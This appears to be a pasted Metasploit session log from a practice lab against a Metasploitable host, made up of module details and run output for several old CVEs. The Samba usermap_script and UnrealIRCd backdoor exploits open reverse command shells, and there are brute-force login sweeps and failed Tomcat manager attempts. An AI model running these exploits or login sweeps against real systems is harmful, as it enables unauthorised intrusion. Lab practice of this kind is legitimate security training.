Untitled

a guest
Jun 1st, 2016

Exploit auxiliary/scanner/http/ssl_version for CVE 2014-3566

       Name: HTTP SSL/TLS Version Detection (POODLE scanner)
     Module: auxiliary/scanner/http/ssl_version
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-10-14

Provided by:
  todb

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS      192.168.26.134   yes       The target address range or CIDR identifier
  RPORT       443              yes       The target port
  SSL         true             no        Negotiate SSL/TLS for outgoing connections
  SSLVersion  Auto             no        Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, SSL2, SSL3, SSL23, TLS, TLS1, TLS1.1, TLS1.2)
  THREADS     1                yes       The number of concurrent threads
  VHOST                        no        HTTP server virtual host

Description:
  Check if an HTTP server supports a given version of SSL/TLS. If a web server can successfully establish an SSLv3 session, it is likely to be vulnerable to the POODLE attack described on October 14, 2014, as a patch against the attack is unlikely.

References:
  http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html
  http://www.osvdb.org/113251
  http://cvedetails.com/cve/2014-3566/

Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed

Exploit exploit/multi/samba/usermap_script for CVE 2007-2447

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.26.134   yes       The target address
  RPORT  139              yes       The target port

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

References:
  http://cvedetails.com/cve/2007-2447/
  http://www.osvdb.org/34700
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html

Started reverse TCP double handler on 192.168.26.132:4444
Accepted the first client connection...
Accepted the second client connection...
Command: echo 4tBUZ57jKoufw6Hh;
Writing to socket A
Writing to socket B
Reading from sockets...
Reading from socket B
B: "4tBUZ57jKoufw6Hh\r\n"
Matching...
A is input...
Command shell session 1 opened (192.168.26.132:4444 -> 192.168.26.134:33595) at 2016-05-31 16:51:30 +0100
Session 1 created in the background.

Exploit auxiliary/scanner/nfs/nfsmount for CVE 1999-0170

       Name: NFS Mount Scanner
     Module: auxiliary/scanner/nfs/nfsmount
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  tebo

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PROTOCOL  udp              yes       The protocol to use (Accepted: udp, tcp)
  RHOSTS    192.168.26.134   yes       The target address range or CIDR identifier
  RPORT     111              yes       The target port
  THREADS   1                yes       The number of concurrent threads

Description:
  This module scans NFS mounts and their permissions.

References:
  http://cvedetails.com/cve/1999-0170/
  http://www.ietf.org/rfc/rfc1094.txt

192.168.26.134:111 - 192.168.26.134 NFS Export: / [*]
192.168.26.134:111 - Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed

Exploit auxiliary/scanner/rservices/rlogin_login for CVE 1999-0651

       Name: rlogin Authentication Scanner
     Module: auxiliary/scanner/rservices/rlogin_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  jduck

Basic options:
  Name              Current Setting                                                          Required  Description
  ----              ---------------                                                          --------  -----------
  BLANK_PASSWORDS   true                                                                     no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                        yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                    no        Try each user/password couple stored in the current database
  DB_ALL_PASS       true                                                                     no        Add all passwords in the current database to the list
  DB_ALL_USERS      true                                                                     no        Add all users in the current database to the list
  FROMUSER                                                                                   no        The username to login from
  FROMUSER_FILE     /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt  no        File containing from usernames, one per line
  PASSWORD                                                                                   no        A specific password to authenticate with
  PASS_FILE                                                                                  no        File containing passwords, one per line
  RHOSTS            192.168.26.134                                                           yes       The target address range or CIDR identifier
  RPORT             513                                                                      yes       The target port
  SPEED             9600                                                                     yes       The terminal speed desired
  STOP_ON_SUCCESS   false                                                                    yes       Stop guessing when a credential works for a host
  TERM              vt100                                                                    yes       The terminal type desired
  THREADS           1                                                                        yes       The number of concurrent threads
  USERNAME                                                                                   no        A specific username to authenticate as
  USERPASS_FILE                                                                              no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                    no        Try the username as the password for all users
  USER_FILE                                                                                  no        File containing usernames, one per line
  VERBOSE           true                                                                     yes       Whether to print output for all attempts

Description:
  This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).

References:
  http://cvedetails.com/cve/1999-0651/
  http://cvedetails.com/cve/1999-0502/

192.168.26.134:513 - 192.168.26.134:513 - Starting rlogin sweep
192.168.26.134:513 - Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed

Exploit auxiliary/scanner/rservices/rsh_login for CVE 1999-0651

       Name: rsh Authentication Scanner
     Module: auxiliary/scanner/rservices/rsh_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  jduck

Basic options:
  Name              Current Setting                                                          Required  Description
  ----              ---------------                                                          --------  -----------
  BLANK_PASSWORDS   true                                                                     no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                        yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                    no        Try each user/password couple stored in the current database
  DB_ALL_PASS       true                                                                     no        Add all passwords in the current database to the list
  DB_ALL_USERS      true                                                                     no        Add all users in the current database to the list
  ENABLE_STDERR     false                                                                    yes       Enables connecting the stderr port
  FROMUSER                                                                                   no        The username to login from
  FROMUSER_FILE     /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt  no        File containing from usernames, one per line
  PASSWORD                                                                                   no        A specific password to authenticate with
  PASS_FILE                                                                                  no        File containing passwords, one per line
  RHOSTS            192.168.26.134                                                           yes       The target address range or CIDR identifier
  RPORT             514                                                                      yes       The target port
  STOP_ON_SUCCESS   false                                                                    yes       Stop guessing when a credential works for a host
  THREADS           1                                                                        yes       The number of concurrent threads
  USERNAME                                                                                   no        A specific username to authenticate as
  USERPASS_FILE                                                                              no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                    no        Try the username as the password for all users
  USER_FILE                                                                                  no        File containing usernames, one per line
  VERBOSE           true                                                                     yes       Whether to print output for all attempts

Description:
  This module will test a shell (rsh) service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).

References:
  http://cvedetails.com/cve/1999-0651/
  http://cvedetails.com/cve/1999-0502/

192.168.26.134:514 - 192.168.26.134:514 - Starting rsh sweep
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'root'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'daemon'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'bin'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'nobody'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from '+'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'guest'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'mail'
192.168.26.134:514 - Result: Permission denied.
192.168.26.134:514 - Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed

Exploit auxiliary/scanner/rservices/rexec_login for CVE 1999-0651

       Name: rexec Authentication Scanner
     Module: auxiliary/scanner/rservices/rexec_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  jduck

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   true             no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
  DB_ALL_PASS       true             no        Add all passwords in the current database to the list
  DB_ALL_USERS      true             no        Add all users in the current database to the list
  ENABLE_STDERR     false            yes       Enables connecting the stderr port
  PASSWORD                           no        A specific password to authenticate with
  PASS_FILE                          no        File containing passwords, one per line
  RHOSTS            192.168.26.134   yes       The target address range or CIDR identifier
  RPORT             512              yes       The target port
  STDERR_PORT                        no        The port to listen on for stderr
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           1                yes       The number of concurrent threads
  USERNAME                           no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false            no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           true             yes       Whether to print output for all attempts

Description:
  This module will test an rexec service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).

References:
  http://cvedetails.com/cve/1999-0651/
  http://cvedetails.com/cve/1999-0502/

192.168.26.134:512 - 192.168.26.134:512 - Starting rexec sweep
192.168.26.134:512 - Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed

Exploit exploit/unix/irc/unreal_ircd_3281_backdoor for CVE 2010-2075

       Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
     Module: exploit/unix/irc/unreal_ircd_3281_backdoor
   Platform: Unix
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-06-12

Provided by:
  hdm

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.26.134   yes       The target address
  RPORT  6667             yes       The target port

Payload information:
  Space: 1024

Description:
  This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

References:
  http://cvedetails.com/cve/2010-2075/
  http://www.osvdb.org/65445
  http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Started reverse TCP double handler on 192.168.26.132:4444
192.168.26.134:6667 - Connected to 192.168.26.134:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached)
192.168.26.134:6667 - Sending backdoor command...
Accepted the first client connection...
Accepted the second client connection...
Command: echo fZiSmZsm5BJR9h4J;
Writing to socket A
Writing to socket B
Reading from sockets...
Reading from socket B
B: "fZiSmZsm5BJR9h4J\r\n"
Matching...
A is input...
Command shell session 2 opened (192.168.26.132:4444 -> 192.168.26.134:33597) at 2016-05-31 16:52:11 +0100
Session 2 created in the background.

Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2009-3548

       Name: Tomcat Application Manager Login Utility
     Module: auxiliary/scanner/http/tomcat_mgr_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  MC
  Matteo Cantoni
  jduck

Basic options:
  Name              Current Setting                                                                 Required  Description
  ----              ---------------                                                                 --------  -----------
  BLANK_PASSWORDS   true                                                                            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
  DB_ALL_PASS       true                                                                            no        Add all passwords in the current database to the list
  DB_ALL_USERS      true                                                                            no        Add all users in the current database to the list
  PASSWORD                                                                                          no        A specific password to authenticate with
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS            192.168.26.134                                                                  yes       The target address range or CIDR identifier
  RPORT             8080                                                                            yes       The target port
  SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
  STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
  TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
  THREADS           1                                                                               yes       The number of concurrent threads
  USERNAME                                                                                          no        A specific username to authenticate as
  USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                           no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
  VERBOSE           true                                                                            yes       Whether to print output for all attempts
  VHOST                                                                                             no        HTTP server virtual host

Description:
  This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://www.securityfocus.com/bid/37086
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
  http://www.zerodayinitiative.com/advisories/ZDI-09-085
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/
  http://cvedetails.com/cve/1999-0502/

192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080).
Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed

Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2009-3548

       Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution
     Module: exploit/multi/http/tomcat_mgr_deploy
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Java Universal
  2   Windows Universal
  3   Linux x86

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST     192.168.26.134   yes       The target address
  RPORT     80               yes       The target port
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME                   no        The username to authenticate as
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
Exploit completed, but no session was created.

Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2009-3548

       Name: Apache Tomcat Manager Authenticated Upload Code Execution
     Module: exploit/multi/http/tomcat_mgr_upload
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  rangercha

Available targets:
  Id  Name
  --  ----
  0   Java Universal
  1   Windows Universal
  2   Linux x86

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        The password for the specified username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      192.168.26.134   yes       The target address
  RPORT      80               yes       The target port
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
  USERNAME                    no        The username to authenticate as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
Exploit completed, but no session was created.

Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2010-0557

       Name: Tomcat Application Manager Login Utility
     Module: auxiliary/scanner/http/tomcat_mgr_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  MC
  Matteo Cantoni
  jduck

Basic options:
  Name              Current Setting                                                                 Required  Description
  ----              ---------------                                                                 --------  -----------
  BLANK_PASSWORDS   true                                                                            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
  DB_ALL_PASS       true                                                                            no        Add all passwords in the current database to the list
  DB_ALL_USERS      true                                                                            no        Add all users in the current database to the list
  PASSWORD                                                                                          no        A specific password to authenticate with
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS            192.168.26.134                                                                  yes       The target address range or CIDR identifier
  RPORT             8080                                                                            yes       The target port
  SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
  STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
  TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
  THREADS           1                                                                               yes       The number of concurrent threads
  USERNAME                                                                                          no        A specific username to authenticate as
  USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                           no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
  VERBOSE           true                                                                            yes       Whether to print output for all attempts
  VHOST                                                                                             no        HTTP server virtual host

Description:
  This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://www.securityfocus.com/bid/37086
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
  http://www.zerodayinitiative.com/advisories/ZDI-09-085
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/
  http://cvedetails.com/cve/1999-0502/

192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080).
Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed

Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2010-0557

       Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution
     Module: exploit/multi/http/tomcat_mgr_deploy
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Java Universal
  2   Windows Universal
  3   Linux x86

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST     192.168.26.134   yes       The target address
  RPORT     80               yes       The target port
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME                   no        The username to authenticate as
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
Exploit completed, but no session was created.

Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2010-0557

       Name: Apache Tomcat Manager Authenticated Upload Code Execution
     Module: exploit/multi/http/tomcat_mgr_upload
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  rangercha

Available targets:
  Id  Name
  --  ----
  0   Java Universal
  1   Windows Universal
  2   Linux x86

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        The password for the specified username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      192.168.26.134   yes       The target address
  RPORT      80               yes       The target port
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
  USERNAME                    no        The username to authenticate as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
Exploit completed, but no session was created.

Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2010-4094

       Name: Tomcat Application Manager Login Utility
     Module: auxiliary/scanner/http/tomcat_mgr_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  MC
  Matteo Cantoni
  jduck

Basic options:
  Name              Current Setting                                                                 Required  Description
  ----              ---------------                                                                 --------  -----------
  BLANK_PASSWORDS   true                                                                            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
  DB_ALL_PASS       true                                                                            no        Add all passwords in the current database to the list
  DB_ALL_USERS      true                                                                            no        Add all users in the current database to the list
  PASSWORD                                                                                          no        A specific password to authenticate with
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS            192.168.26.134                                                                  yes       The target address range or CIDR identifier
  RPORT             8080                                                                            yes       The target port
  SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
  STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
  TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
  THREADS           1                                                                               yes       The number of concurrent threads
  USERNAME                                                                                          no        A specific username to authenticate as
  USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                           no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
  VERBOSE           true                                                                            yes       Whether to print output for all attempts
  VHOST                                                                                             no        HTTP server virtual host

Description:
  This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://www.securityfocus.com/bid/37086
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
  http://www.zerodayinitiative.com/advisories/ZDI-09-085
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/
  http://cvedetails.com/cve/1999-0502/

192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080).
Scanned 1 of 1 hosts (100% complete)
Auxiliary module execution completed

Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2010-4094

       Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution
     Module: exploit/multi/http/tomcat_mgr_deploy
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Java Universal
  2   Windows Universal
  3   Linux x86

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST     192.168.26.134   yes       The target address
  RPORT     80               yes       The target port
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME                   no        The username to authenticate as
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
